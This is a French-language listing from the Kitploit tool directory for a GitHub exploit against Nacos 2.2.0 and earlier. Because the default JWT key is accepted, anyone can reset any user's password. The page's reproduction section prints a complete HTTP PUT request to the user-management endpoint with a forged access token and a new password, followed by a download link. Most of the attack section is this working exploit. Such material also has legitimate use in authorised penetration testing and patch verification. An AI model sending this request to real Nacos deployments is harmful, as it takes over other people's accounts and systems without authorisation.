Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Alibab-Nacos-Unauthorized-Reset-PWD — Alibab-Nacos-Unauthorized-Reset PWD | Kitploit
Outils/GitHubGitHub/al1ex/alibab-nacos-unauthorized-reset-pwd
Authentication & AuthorizationPassword AttacksExploitationWeb Application ExploitationPenetration TestingMisconfigurationRed TeamingAPI Security

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
al1ex/alibab-nacos-unauthorized-reset-pwd

Alibab-Nacos-Unauthorized-Reset-PWD

Alibab-Nacos-Unauthorized-Reset PWD

Voir le dépôt
41il y a 3 ansPas encore vérifié

Impact de la vulnérabilité

Un problème a été découvert dans Nacos affectant Nacos <= 2.2.0. Lorsqu'un utilisateur utilise la clé JWT par défaut, cela permet à un attaquant de réinitialiser le mot de passe de n'importe quel utilisateur et de prendre le contrôle du compte.

Produit vulnérable

Nacos version <= 2.2.0

Reproduction de la vulnérabilité

Étape 1:Obtenir le nom d'utilisateur (peut utiliser une ancienne vulnérabilité ou deviner)

getuser

Étape 2:Réinitialiser le mot de passe

root@kitploit:~
PUT /nacos/v1/auth/users HTTP/1.1
Host: xx.xx.xxx.xx
Content-Length: 33
Accept: application/json, text/plain, */*
accessToken: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhbDFleCIsImV4cCI6MTY2ODA4OTk2N30.hv0MWlHISYCgvIDQhidQBCeyYb7tbG0JrbNyx-9kDzc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=
Connection: close

username=al1ex&newPassword=al22ex

reset

Étape 3: Connexion réussie

logins

Télécharger l’outil